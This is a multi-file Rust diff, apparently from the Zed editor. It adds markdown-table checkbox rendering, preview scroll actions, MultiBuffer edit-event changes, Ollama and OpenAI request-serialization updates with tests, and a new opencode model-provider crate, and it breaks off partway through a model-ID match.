+ MarkdownEvent::Text if in_table => {
+ // Text events carry only a source range; slice the input to recover the text.
+ current_cell.push_str(&md[range.clone()]);
+ }
+ _ => {}
+ }
+ }
+
+ // Both body cells should read back as checkbox literals.
+ let checkbox_cells: Vec<&String> = cell_texts
+ .iter()
+ .filter(|t| {
+ let trimmed = t.trim();
+ trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]"
+ })
+ .collect();
+ assert_eq!(
+ checkbox_cells.len(),
+ 2,
+ "Expected 2 checkbox cells, got: {cell_texts:?}"
+ );
+ assert_eq!(checkbox_cells[0].trim(), "[x]");
+ assert_eq!(checkbox_cells[1].trim(), "[ ]");
+ }
+
#[gpui::test]
fn test_inline_code_word_selection_excludes_backticks(cx: &mut TestAppContext) {
// Test that double-clicking on inline code selects just the code content,
@@ -19,7 +19,6 @@ anyhow.workspace = true
async-recursion.workspace = true
collections.workspace = true
editor.workspace = true
-fs.workspace = true
gpui.workspace = true
html5ever.workspace = true
language.workspace = true
@@ -30,6 +29,7 @@ markup5ever_rcdom.workspace = true
pretty_assertions.workspace = true
pulldown-cmark.workspace = true
settings.workspace = true
+stacksafe.workspace = true
theme.workspace = true
ui.workspace = true
urlencoding.workspace = true
@@ -10,6 +10,7 @@ use language::LanguageRegistry;
use markdown::parser::PARSE_OPTIONS;
use markup5ever_rcdom::RcDom;
use pulldown_cmark::{Alignment, Event, Parser, Tag, TagEnd};
+use stacksafe::stacksafe;
use std::{
cell::RefCell, collections::HashMap, mem, ops::Range, path::PathBuf, rc::Rc, sync::Arc, vec,
};
@@ -907,6 +908,7 @@ impl<'a> MarkdownParser<'a> {
elements
}
+ #[stacksafe]
fn parse_html_node(
&self,
source_range: Range<usize>,
@@ -1013,6 +1015,7 @@ impl<'a> MarkdownParser<'a> {
}
}
+ #[stacksafe]
fn parse_paragraph(
&self,
source_range: Range<usize>,
@@ -2773,6 +2776,35 @@ Some other content
);
}
+ // The parser should keep checkbox literals ("[x]", "[ ]") in table cells as
+ // plain text chunks; the renderer is responsible for swapping them for
+ // checkbox elements later.
+ #[gpui::test]
+ async fn test_table_with_checkboxes() {
+ let markdown = "\
+| Done | Task |
+|------|---------|
+| [x] | Fix bug |
+| [ ] | Add feature |";
+
+ let parsed = parse(markdown).await;
+ let table = match &parsed.children[0] {
+ ParsedMarkdownElement::Table(table) => table,
+ other => panic!("Expected table, got: {:?}", other),
+ };
+
+ // First body row, first column: checked checkbox literal survives as text.
+ let first_cell = &table.body[0].columns[0];
+ let first_cell_text = match &first_cell.children[0] {
+ MarkdownParagraphChunk::Text(t) => t.contents.to_string(),
+ other => panic!("Expected text chunk, got: {:?}", other),
+ };
+ assert_eq!(first_cell_text.trim(), "[x]");
+
+ // Second body row: unchecked literal likewise preserved.
+ let second_cell = &table.body[1].columns[0];
+ let second_cell_text = match &second_cell.children[0] {
+ MarkdownParagraphChunk::Text(t) => t.contents.to_string(),
+ other => panic!("Expected text chunk, got: {:?}", other),
+ };
+ assert_eq!(second_cell_text.trim(), "[ ]");
+ }
+
#[gpui::test]
async fn test_list_basic() {
let parsed = parse(
@@ -26,6 +26,10 @@ actions!(
ScrollUpByItem,
/// Scrolls down by one markdown element in the markdown preview
ScrollDownByItem,
+ /// Scrolls to the top of the markdown preview.
+ ScrollToTop,
+ /// Scrolls to the bottom of the markdown preview.
+ ScrollToBottom,
/// Opens a following markdown preview that syncs with the editor.
OpenFollowingPreview
]
@@ -8,7 +8,7 @@ use editor::scroll::Autoscroll;
use editor::{Editor, EditorEvent, MultiBufferOffset, SelectionEffects};
use gpui::{
App, ClickEvent, Context, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement,
- IntoElement, IsZero, ListState, ParentElement, Render, RetainAllImageCache, Styled,
+ IntoElement, IsZero, ListOffset, ListState, ParentElement, Render, RetainAllImageCache, Styled,
Subscription, Task, WeakEntity, Window, list,
};
use language::LanguageRegistry;
@@ -26,7 +26,7 @@ use crate::{
markdown_parser::parse_markdown,
markdown_renderer::{RenderContext, render_markdown_block},
};
-use crate::{ScrollDown, ScrollDownByItem, ScrollUp, ScrollUpByItem};
+use crate::{ScrollDown, ScrollDownByItem, ScrollToBottom, ScrollToTop, ScrollUp, ScrollUpByItem};
const REPARSE_DEBOUNCE: Duration = Duration::from_millis(200);
@@ -277,6 +277,7 @@ impl MarkdownPreviewView {
|this, editor, event: &EditorEvent, window, cx| {
match event {
EditorEvent::Edited { .. }
+ | EditorEvent::BufferEdited { .. }
| EditorEvent::DirtyChanged
| EditorEvent::ExcerptsEdited { .. } => {
this.parse_markdown_from_active_editor(true, window, cx);
@@ -510,6 +511,30 @@ impl MarkdownPreviewView {
}
cx.notify();
}
+
+ /// Scrolls the markdown preview to the very first rendered element.
+ fn scroll_to_top(&mut self, _: &ScrollToTop, _window: &mut Window, cx: &mut Context<Self>) {
+ self.list_state.scroll_to(ListOffset {
+ item_ix: 0,
+ offset_in_item: px(0.),
+ });
+ cx.notify();
+ }
+
+ /// Scrolls the markdown preview to its last rendered element.
+ fn scroll_to_bottom(
+ &mut self,
+ _: &ScrollToBottom,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let count = self.list_state.item_count();
+ // Guard the empty list: `count - 1` would underflow.
+ if count > 0 {
+ self.list_state.scroll_to(ListOffset {
+ item_ix: count - 1,
+ // NOTE(review): offset 0 lands at the *top* of the last item; for an
+ // item taller than the viewport its bottom may stay off-screen — confirm
+ // this is the intended behavior.
+ offset_in_item: px(0.),
+ });
+ }
+ cx.notify();
+ }
}
impl Focusable for MarkdownPreviewView {
@@ -561,6 +586,8 @@ impl Render for MarkdownPreviewView {
.on_action(cx.listener(MarkdownPreviewView::scroll_down))
.on_action(cx.listener(MarkdownPreviewView::scroll_up_by_item))
.on_action(cx.listener(MarkdownPreviewView::scroll_down_by_item))
+ .on_action(cx.listener(MarkdownPreviewView::scroll_to_top))
+ .on_action(cx.listener(MarkdownPreviewView::scroll_to_bottom))
.size_full()
.bg(cx.theme().colors().editor_background)
.p_4()
@@ -9,7 +9,6 @@ use crate::{
markdown_preview_view::MarkdownPreviewView,
};
use collections::HashMap;
-use fs::normalize_path;
use gpui::{
AbsoluteLength, Animation, AnimationExt, AnyElement, App, AppContext as _, Context, Div,
Element, ElementId, Entity, HighlightStyle, Hsla, ImageSource, InteractiveText, IntoElement,
@@ -25,6 +24,7 @@ use std::{
};
use theme::{ActiveTheme, SyntaxTheme, ThemeSettings};
use ui::{CopyButton, LinkPreview, ToggleState, prelude::*, tooltip_container};
+use util::normalize_path;
use workspace::{OpenOptions, OpenVisible, Workspace};
pub struct CheckboxClickedEvent {
@@ -698,16 +698,15 @@ fn render_markdown_table(parsed: &ParsedMarkdownTable, cx: &mut RenderContext) -
.when_some(parsed.caption.as_ref(), |this, caption| {
this.children(render_markdown_text(caption, cx))
})
- .border_1()
- .border_color(cx.border_color)
- .rounded_sm()
- .overflow_hidden()
.child(
div()
+ .rounded_sm()
+ .overflow_hidden()
+ .border_1()
+ .border_color(cx.border_color)
.min_w_0()
- .w_full()
.grid()
- .grid_cols(max_column_count as u16)
+ .grid_cols_max_content(max_column_count as u16)
.children(cells),
)
.into_any()
@@ -891,6 +890,24 @@ fn render_markdown_text(parsed_new: &MarkdownParagraph, cx: &mut RenderContext)
for parsed_region in parsed_new {
match parsed_region {
MarkdownParagraphChunk::Text(parsed) => {
+ let trimmed = parsed.contents.trim();
+ if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" {
+ let checked = trimmed != "[ ]";
+ let element = div()
+ .child(MarkdownCheckbox::new(
+ cx.next_id(&parsed.source_range),
+ if checked {
+ ToggleState::Selected
+ } else {
+ ToggleState::Unselected
+ },
+ cx.clone(),
+ ))
+ .into_any();
+ any_element.push(element);
+ continue;
+ }
+
let element_id = cx.next_id(&parsed.source_range);
let highlights = gpui::combine_highlights(
@@ -119,6 +119,7 @@ pub enum Event {
DiffHunksToggled,
Edited {
edited_buffer: Option<Entity<Buffer>>,
+ is_local: bool,
},
TransactionUndone {
transaction_id: TransactionId,
@@ -1912,6 +1913,7 @@ impl MultiBuffer {
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsAdded {
buffer,
@@ -1974,6 +1976,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsRemoved {
ids,
@@ -2138,7 +2141,7 @@ impl MultiBuffer {
if point < start {
found = Some((start, excerpt_id));
}
- if point > end {
+ if point >= end {
found = Some((end, excerpt_id));
}
}
@@ -2330,6 +2333,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsRemoved {
ids,
@@ -2394,8 +2398,9 @@ impl MultiBuffer {
use language::BufferEvent;
let buffer_id = buffer.read(cx).remote_id();
cx.emit(match event {
- BufferEvent::Edited => Event::Edited {
+ &BufferEvent::Edited { is_local } => Event::Edited {
edited_buffer: Some(buffer),
+ is_local,
},
BufferEvent::DirtyChanged => Event::DirtyChanged,
BufferEvent::Saved => Event::Saved,
@@ -2485,6 +2490,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
@@ -2531,6 +2537,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
@@ -2770,6 +2777,7 @@ impl MultiBuffer {
cx.emit(Event::DiffHunksToggled);
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
@@ -2886,6 +2894,7 @@ impl MultiBuffer {
cx.emit(Event::DiffHunksToggled);
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
@@ -2953,6 +2962,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsExpanded { ids: vec![id] });
cx.notify();
@@ -3060,6 +3070,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsExpanded { ids });
cx.notify();
@@ -3703,6 +3714,7 @@ impl MultiBuffer {
cx.emit(Event::DiffHunksToggled);
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
}
@@ -5177,6 +5189,11 @@ impl MultiBufferSnapshot {
}
}
+ /// Returns the length of the given row in UTF-16 code units.
+ // Clipping a point with column `u32::MAX` (left-biased) snaps to the last
+ // valid column of the row, which equals the row's UTF-16 length.
+ pub fn line_len_utf16(&self, row: MultiBufferRow) -> u32 {
+ self.clip_point_utf16(Unclipped(PointUtf16::new(row.0, u32::MAX)), Bias::Left)
+ .column
+ }
+
pub fn buffer_line_for_row(
&self,
row: MultiBufferRow,
@@ -6335,7 +6352,7 @@ impl MultiBufferSnapshot {
pub fn runnable_ranges(
&self,
range: Range<Anchor>,
- ) -> impl Iterator<Item = (Range<MultiBufferOffset>, language::RunnableRange)> + '_ {
+ ) -> impl Iterator<Item = (Range<Anchor>, language::RunnableRange)> + '_ {
let range = range.start.to_offset(self)..range.end.to_offset(self);
self.lift_buffer_metadata(range, move |buffer, range| {
Some(
@@ -6348,7 +6365,12 @@ impl MultiBufferSnapshot {
.map(|runnable| (runnable.run_range.clone(), runnable)),
)
})
- .map(|(run_range, runnable, _)| (run_range, runnable))
+ .map(|(run_range, runnable, _)| {
+ (
+ self.anchor_after(run_range.start)..self.anchor_before(run_range.end),
+ runnable,
+ )
+ })
}
pub fn line_indents(
@@ -72,6 +72,30 @@ fn test_singleton(cx: &mut App) {
assert_consistent_line_numbers(&snapshot);
}
+// A buffer point at the very end of a singleton buffer ("abc" -> (0, 3)) should
+// map to an `anchor_after` anchor inside the buffer's single excerpt.
+#[gpui::test]
+fn test_buffer_point_to_anchor_at_end_of_singleton_buffer(cx: &mut App) {
+ let buffer = cx.new(|cx| Buffer::local("abc", cx));
+ let multibuffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx));
+
+ // A singleton multibuffer has exactly one excerpt.
+ let excerpt_id = multibuffer
+ .read(cx)
+ .excerpt_ids()
+ .into_iter()
+ .next()
+ .unwrap();
+ let anchor = multibuffer
+ .read(cx)
+ .buffer_point_to_anchor(&buffer, Point::new(0, 3), cx);
+
+ assert_eq!(
+ anchor,
+ Some(Anchor::in_buffer(
+ excerpt_id,
+ buffer.read(cx).snapshot().anchor_after(Point::new(0, 3)),
+ ))
+ );
+}
+
#[gpui::test]
fn test_remote(cx: &mut App) {
let host_buffer = cx.new(|cx| Buffer::local("a", cx));
@@ -171,12 +195,15 @@ fn test_excerpt_boundaries_and_clipping(cx: &mut App) {
&[
Event::Edited {
edited_buffer: None,
+ is_local: true,
},
Event::Edited {
edited_buffer: None,
+ is_local: true,
},
Event::Edited {
edited_buffer: None,
+ is_local: true,
}
]
);
@@ -123,10 +123,15 @@ pub struct ChatRequest {
// https://github.com/ollama/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values
#[derive(Serialize, Default, Debug)]
pub struct ChatOptions {
+ #[serde(skip_serializing_if = "Option::is_none")]
pub num_ctx: Option<u64>,
+ #[serde(skip_serializing_if = "Option::is_none")]
pub num_predict: Option<isize>,
+ #[serde(skip_serializing_if = "Option::is_none")]
pub stop: Option<Vec<String>>,
+ #[serde(skip_serializing_if = "Option::is_none")]
pub temperature: Option<f32>,
+ #[serde(skip_serializing_if = "Option::is_none")]
pub top_p: Option<f32>,
}
@@ -588,4 +593,96 @@ mod tests {
assert_eq!(message_images.len(), 1);
assert_eq!(message_images[0].as_str().unwrap(), base64_image);
}
+
+ // Regression coverage for `skip_serializing_if = "Option::is_none"` on every
+ // `ChatOptions` field: absent options must be omitted, not serialized as null.
+ #[test]
+ fn test_chat_options_serialization() {
+ // When stop is None, it should not appear in JSON at all
+ // This allows Ollama to use the model's default stop tokens
+ let options_no_stop = ChatOptions {
+ num_ctx: Some(4096),
+ stop: None,
+ temperature: Some(0.7),
+ ..Default::default()
+ };
+ let serialized = serde_json::to_string(&options_no_stop).unwrap();
+ assert!(
+ !serialized.contains("stop"),
+ "stop should not be in JSON when None"
+ );
+ assert!(serialized.contains("num_ctx"));
+ assert!(serialized.contains("temperature"));
+
+ // When stop has values, they should be serialized
+ let options_with_stop = ChatOptions {
+ stop: Some(vec!["<|eot_id|>".to_string()]),
+ ..Default::default()
+ };
+ let serialized = serde_json::to_string(&options_with_stop).unwrap();
+ assert!(serialized.contains("stop"));
+ assert!(serialized.contains("<|eot_id|>"));
+
+ // All None options should result in empty object
+ let options_all_none = ChatOptions::default();
+ let serialized = serde_json::to_string(&options_all_none).unwrap();
+ assert_eq!(serialized, "{}");
+ }
+
+ // Caller-supplied stop tokens must round-trip into `options.stop` in order.
+ #[test]
+ fn test_chat_request_with_stop_tokens() {
+ let request = ChatRequest {
+ model: "rnj-1:8b".to_string(),
+ messages: vec![ChatMessage::User {
+ content: "Hello".to_string(),
+ images: None,
+ }],
+ stream: true,
+ keep_alive: KeepAlive::default(),
+ options: Some(ChatOptions {
+ stop: Some(vec!["<|eot_id|>".to_string(), "<|end|>".to_string()]),
+ ..Default::default()
+ }),
+ think: None,
+ tools: vec![],
+ };
+
+ // Round-trip through JSON so we assert on the actual wire format.
+ let serialized = serde_json::to_string(&request).unwrap();
+ let parsed: serde_json::Value = serde_json::from_str(&serialized).unwrap();
+
+ let stop = parsed["options"]["stop"].as_array().unwrap();
+ assert_eq!(stop.len(), 2);
+ assert_eq!(stop[0].as_str().unwrap(), "<|eot_id|>");
+ assert_eq!(stop[1].as_str().unwrap(), "<|end|>");
+ }
+
+ #[test]
+ fn test_chat_request_without_stop_tokens_omits_field() {
+ // This tests the fix for issue #47798
+ // When no stop tokens are provided, the field should be omitted
+ // so Ollama uses the model's default stop tokens from Modelfile
+ let request = ChatRequest {
+ model: "rnj-1:8b".to_string(),
+ messages: vec![ChatMessage::User {
+ content: "Hello".to_string(),
+ images: None,
+ }],
+ stream: true,
+ keep_alive: KeepAlive::default(),
+ options: Some(ChatOptions {
+ num_ctx: Some(4096),
+ stop: None, // No stop tokens - should be omitted from JSON
+ ..Default::default()
+ }),
+ think: None,
+ tools: vec![],
+ };
+
+ let serialized = serde_json::to_string(&request).unwrap();
+
+ // The key check: "stop" should not appear in the serialized JSON
+ // (quoted to avoid matching the substring inside other keys/values).
+ assert!(
+ !serialized.contains("\"stop\""),
+ "stop field should be omitted when None, got: {}",
+ serialized
+ );
+ }
}
@@ -10,9 +10,8 @@ use theme::{
ThemeSettings,
};
use ui::{
- Divider, ParentElement as _, StatefulInteractiveElement, SwitchField, TintColor,
- ToggleButtonGroup, ToggleButtonGroupSize, ToggleButtonSimple, ToggleButtonWithIcon, Tooltip,
- prelude::*, rems_from_px,
+ Divider, StatefulInteractiveElement, SwitchField, TintColor, ToggleButtonGroup,
+ ToggleButtonGroupSize, ToggleButtonSimple, ToggleButtonWithIcon, Tooltip, prelude::*,
};
use vim_mode_setting::VimModeSetting;
@@ -477,8 +476,7 @@ fn render_setting_import_button(
.toggle_state(imported)
.tab_index(tab_index)
.when(imported, |this| {
- this.icon(IconName::Check)
- .icon_size(IconSize::Small)
+ this.end_icon(Icon::new(IconName::Check).size(IconSize::Small))
.color(Color::Success)
})
.on_click(move |_, window, cx| {
@@ -2,7 +2,7 @@ use std::collections::HashSet;
use std::sync::OnceLock;
use std::sync::atomic::{AtomicUsize, Ordering};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use gpui::{App, EntityId, EventEmitter, Subscription};
use ui::{IconButtonShape, Tooltip, prelude::*};
use workspace::item::{ItemBufferKind, ItemEvent, ItemHandle};
@@ -35,10 +35,10 @@ impl MultibufferHint {
}
impl MultibufferHint {
- fn counter() -> &'static AtomicUsize {
+ fn counter(cx: &App) -> &'static AtomicUsize {
static SHOWN_COUNT: OnceLock<AtomicUsize> = OnceLock::new();
SHOWN_COUNT.get_or_init(|| {
- let value: usize = KEY_VALUE_STORE
+ let value: usize = KeyValueStore::global(cx)
.read_kvp(SHOWN_COUNT_KEY)
.ok()
.flatten()
@@ -49,19 +49,21 @@ impl MultibufferHint {
})
}
- fn shown_count() -> usize {
- Self::counter().load(Ordering::Relaxed)
+ fn shown_count(cx: &App) -> usize {
+ Self::counter(cx).load(Ordering::Relaxed)
}
fn increment_count(cx: &mut App) {
- Self::set_count(Self::shown_count() + 1, cx)
+ Self::set_count(Self::shown_count(cx) + 1, cx)
}
pub(crate) fn set_count(count: usize, cx: &mut App) {
- Self::counter().store(count, Ordering::Relaxed);
+ Self::counter(cx).store(count, Ordering::Relaxed);
- db::write_and_log(cx, move || {
- KEY_VALUE_STORE.write_kvp(SHOWN_COUNT_KEY.to_string(), format!("{}", count))
+ let kvp = KeyValueStore::global(cx);
+ db::write_and_log(cx, move || async move {
+ kvp.write_kvp(SHOWN_COUNT_KEY.to_string(), format!("{}", count))
+ .await
});
}
@@ -71,7 +73,7 @@ impl MultibufferHint {
/// Determines the toolbar location for this [`MultibufferHint`].
fn determine_toolbar_location(&mut self, cx: &mut Context<Self>) -> ToolbarItemLocation {
- if Self::shown_count() >= NUMBER_OF_HINTS {
+ if Self::shown_count(cx) >= NUMBER_OF_HINTS {
return ToolbarItemLocation::Hidden;
}
@@ -158,10 +160,11 @@ impl Render for MultibufferHint {
)
.child(
Button::new("open_docs", "Learn More")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::End)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_event, _, cx| {
cx.open_url("https://zed.dev/docs/multibuffers")
}),
@@ -1,6 +1,6 @@
use crate::multibuffer_hint::MultibufferHint;
use client::{Client, UserStore, zed_urls};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use fs::Fs;
use gpui::{
Action, AnyElement, App, AppContext, AsyncWindowContext, Context, Entity, EventEmitter,
@@ -194,8 +194,10 @@ pub fn show_onboarding_view(app_state: Arc<AppState>, cx: &mut App) -> Task<anyh
cx.notify();
};
- db::write_and_log(cx, || {
- KEY_VALUE_STORE.write_kvp(FIRST_OPEN.to_string(), "false".to_string())
+ let kvp = KeyValueStore::global(cx);
+ db::write_and_log(cx, move || async move {
+ kvp.write_kvp(FIRST_OPEN.to_string(), "false".to_string())
+ .await
});
},
)
@@ -559,7 +561,7 @@ impl workspace::SerializableItem for Onboarding {
alive_items,
workspace_id,
"onboarding_pages",
- &persistence::ONBOARDING_PAGES,
+ &persistence::OnboardingPagesDb::global(cx),
cx,
)
}
@@ -572,10 +574,9 @@ impl workspace::SerializableItem for Onboarding {
window: &mut Window,
cx: &mut App,
) -> gpui::Task<gpui::Result<Entity<Self>>> {
+ let db = persistence::OnboardingPagesDb::global(cx);
window.spawn(cx, async move |cx| {
- if let Some(_) =
- persistence::ONBOARDING_PAGES.get_onboarding_page(item_id, workspace_id)?
- {
+ if let Some(_) = db.get_onboarding_page(item_id, workspace_id)? {
workspace.update(cx, |workspace, cx| Onboarding::new(workspace, cx))
} else {
Err(anyhow::anyhow!("No onboarding page to deserialize"))
@@ -593,11 +594,12 @@ impl workspace::SerializableItem for Onboarding {
) -> Option<gpui::Task<gpui::Result<()>>> {
let workspace_id = workspace.database_id()?;
- Some(cx.background_spawn(async move {
- persistence::ONBOARDING_PAGES
- .save_onboarding_page(item_id, workspace_id)
- .await
- }))
+ let db = persistence::OnboardingPagesDb::global(cx);
+ Some(
+ cx.background_spawn(
+ async move { db.save_onboarding_page(item_id, workspace_id).await },
+ ),
+ )
}
fn should_serialize(&self, event: &Self::Event) -> bool {
@@ -646,7 +648,7 @@ mod persistence {
];
}
- db::static_connection!(ONBOARDING_PAGES, OnboardingPagesDb, [WorkspaceDb]);
+ db::static_connection!(OnboardingPagesDb, [WorkspaceDb]);
impl OnboardingPagesDb {
query! {
@@ -295,12 +295,27 @@ impl Model {
}
}
+/// OpenAI-compatible `stream_options` object; serialized as
+/// `Request::stream_options` when present.
+#[derive(Debug, Serialize, Deserialize)]
+pub struct StreamOptions {
+ /// When true, asks the server to report token usage for the streamed response.
+ pub include_usage: bool,
+}
+
+// Opt in to usage reporting by default for streamed requests.
+impl Default for StreamOptions {
+ fn default() -> Self {
+ Self {
+ include_usage: true,
+ }
+ }
+}
+
#[derive(Debug, Serialize, Deserialize)]
pub struct Request {
pub model: String,
pub messages: Vec<RequestMessage>,
pub stream: bool,
#[serde(default, skip_serializing_if = "Option::is_none")]
+ pub stream_options: Option<StreamOptions>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
pub max_completion_tokens: Option<u64>,
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub stop: Vec<String>,
@@ -55,7 +55,14 @@ pub struct ResponseFunctionCallItem {
#[derive(Debug, Serialize, Deserialize)]
pub struct ResponseFunctionCallOutputItem {
pub call_id: String,
- pub output: String,
+ pub output: ResponseFunctionCallOutputContent,
+}
+
+/// Output payload of a function-call result: either structured content parts
+/// or a plain string.
+// With `#[serde(untagged)]`, deserialization tries variants in declaration
+// order — a JSON array matches `List`, a JSON string matches `Text`.
+#[derive(Debug, Serialize, Deserialize)]
+#[serde(untagged)]
+pub enum ResponseFunctionCallOutputContent {
+ List(Vec<ResponseInputContent>),
+ Text(String),
+}
#[derive(Debug, Clone, Serialize, Deserialize)]
@@ -8,6 +8,7 @@ pub struct FileFinderSettings {
pub modal_max_width: FileFinderWidth,
pub skip_focus_for_active_in_search: bool,
pub include_ignored: Option<bool>,
+ pub include_channels: bool,
}
impl Settings for FileFinderSettings {
@@ -23,6 +24,7 @@ impl Settings for FileFinderSettings {
settings::IncludeIgnoredContent::Indexed => Some(false),
settings::IncludeIgnoredContent::Smart => None,
},
+ include_channels: file_finder.include_channels.unwrap(),
}
}
}
@@ -0,0 +1,27 @@
+[package]
+name = "opencode"
+version = "0.1.0"
+edition.workspace = true
+publish.workspace = true
+license = "GPL-3.0-or-later"
+
+[lints]
+workspace = true
+
+[lib]
+path = "src/opencode.rs"
+test = false
+
+[features]
+default = []
+schemars = ["dep:schemars"]
+
+[dependencies]
+anyhow.workspace = true
+futures.workspace = true
+google_ai.workspace = true
+http_client.workspace = true
+schemars = { workspace = true, optional = true }
+serde.workspace = true
+serde_json.workspace = true
+strum.workspace = true
@@ -0,0 +1 @@
+../../LICENSE-GPL
@@ -0,0 +1,453 @@
+use anyhow::{Result, anyhow};
+use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::BoxStream};
+use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest};
+use serde::{Deserialize, Serialize};
+use strum::EnumIter;
+
+pub const OPENCODE_API_URL: &str = "https://opencode.ai/zen";
+
+/// Wire protocol used to communicate with a model (see `Model::protocol`).
+#[derive(Clone, Copy, Debug, Default, PartialEq, Eq, Serialize, Deserialize)]
+#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))]
+#[serde(rename_all = "snake_case")]
+pub enum ApiProtocol {
+ #[default]
+ Anthropic,
+ OpenAiResponses,
+ OpenAiChat,
+ Google,
+}
+
+/// Models available through the opencode endpoint, grouped by wire protocol.
+/// `#[serde(rename = ...)]` gives each variant its wire identifier (see `id()`);
+/// `Custom` lets users configure models not listed here.
+#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))]
+#[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)]
+pub enum Model {
+ // -- Anthropic protocol models --
+ #[serde(rename = "claude-opus-4-6")]
+ ClaudeOpus4_6,
+ #[serde(rename = "claude-opus-4-5")]
+ ClaudeOpus4_5,
+ #[serde(rename = "claude-opus-4-1")]
+ ClaudeOpus4_1,
+ #[default]
+ #[serde(rename = "claude-sonnet-4-6")]
+ ClaudeSonnet4_6,
+ #[serde(rename = "claude-sonnet-4-5")]
+ ClaudeSonnet4_5,
+ #[serde(rename = "claude-sonnet-4")]
+ ClaudeSonnet4,
+ #[serde(rename = "claude-haiku-4-5")]
+ ClaudeHaiku4_5,
+ #[serde(rename = "claude-3-5-haiku")]
+ Claude3_5Haiku,
+
+ // -- OpenAI Responses API models --
+ #[serde(rename = "gpt-5.4")]
+ Gpt5_4,
+ #[serde(rename = "gpt-5.4-pro")]
+ Gpt5_4Pro,
+ #[serde(rename = "gpt-5.4-mini")]
+ Gpt5_4Mini,
+ #[serde(rename = "gpt-5.4-nano")]
+ Gpt5_4Nano,
+ #[serde(rename = "gpt-5.3-codex")]
+ Gpt5_3Codex,
+ #[serde(rename = "gpt-5.3-codex-spark")]
+ Gpt5_3Spark,
+ #[serde(rename = "gpt-5.2")]
+ Gpt5_2,
+ #[serde(rename = "gpt-5.2-codex")]
+ Gpt5_2Codex,
+ #[serde(rename = "gpt-5.1")]
+ Gpt5_1,
+ #[serde(rename = "gpt-5.1-codex")]
+ Gpt5_1Codex,
+ #[serde(rename = "gpt-5.1-codex-max")]
+ Gpt5_1CodexMax,
+ #[serde(rename = "gpt-5.1-codex-mini")]
+ Gpt5_1CodexMini,
+ #[serde(rename = "gpt-5")]
+ Gpt5,
+ #[serde(rename = "gpt-5-codex")]
+ Gpt5Codex,
+ #[serde(rename = "gpt-5-nano")]
+ Gpt5Nano,
+
+ // -- Google protocol models --
+ #[serde(rename = "gemini-3.1-pro")]
+ Gemini3_1Pro,
+ #[serde(rename = "gemini-3-flash")]
+ Gemini3Flash,
+
+ // -- OpenAI Chat Completions protocol models --
+ #[serde(rename = "minimax-m2.5")]
+ MiniMaxM2_5,
+ #[serde(rename = "minimax-m2.5-free")]
+ MiniMaxM2_5Free,
+ #[serde(rename = "glm-5")]
+ Glm5,
+ #[serde(rename = "kimi-k2.5")]
+ KimiK2_5,
+ #[serde(rename = "mimo-v2-pro-free")]
+ MimoV2ProFree,
+ #[serde(rename = "mimo-v2-omni-free")]
+ MimoV2OmniFree,
+ #[serde(rename = "mimo-v2-flash-free")]
+ MimoV2FlashFree,
+ #[serde(rename = "trinity-large-preview-free")]
+ TrinityLargePreviewFree,
+ #[serde(rename = "big-pickle")]
+ BigPickle,
+ #[serde(rename = "nemotron-3-super-free")]
+ Nemotron3SuperFree,
+
+ // -- Custom model --
+ // User-configured model: carries its own limits and wire protocol.
+ #[serde(rename = "custom")]
+ Custom {
+ name: String,
+ display_name: Option<String>,
+ max_tokens: u64,
+ max_output_tokens: Option<u64>,
+ protocol: ApiProtocol,
+ },
+}
+
+impl Model {
+ pub fn default_fast() -> Self {
+ Self::ClaudeHaiku4_5
+ }
+
+ pub fn id(&self) -> &str {
+ match self {
+ Self::ClaudeOpus4_6 => "claude-opus-4-6",
+ Self::ClaudeOpus4_5 => "claude-opus-4-5",
+ Self::ClaudeOpus4_1 => "claude-opus-4-1",
+ Self::ClaudeSonnet4_6 => "claude-sonnet-4-6",
+ Self::ClaudeSonnet4_5 => "claude-sonnet-4-5",
+ Self::ClaudeSonnet4 => "claude-sonnet-4",
+ Self::ClaudeHaiku4_5 => "claude-haiku-4-5",
+ Self::Claude3_5Haiku => "claude-3-5-haiku",
+
+ Self::Gpt5_4 => "gpt-5.4",
+ Self::Gpt5_4Pro => "gpt-5.4-pro",
+ Self::Gpt5_4Mini => "gpt-5.4-mini",
+ Self::Gpt5_4Nano => "gpt-5.4-nano",
+ Self::Gpt5_3Codex => "gpt-5.3-codex",
+ Self::Gpt5_3Spark => "gpt-5.3-codex-spark",
+ Self::Gpt5_2 => "gpt-5.2",
+ Self::Gpt5_2Codex => "gpt-5.2-codex",
+ Self::Gpt5_1 => "gpt-5.1",
+ Self::Gpt5_1Codex => "gpt-5.1-codex",
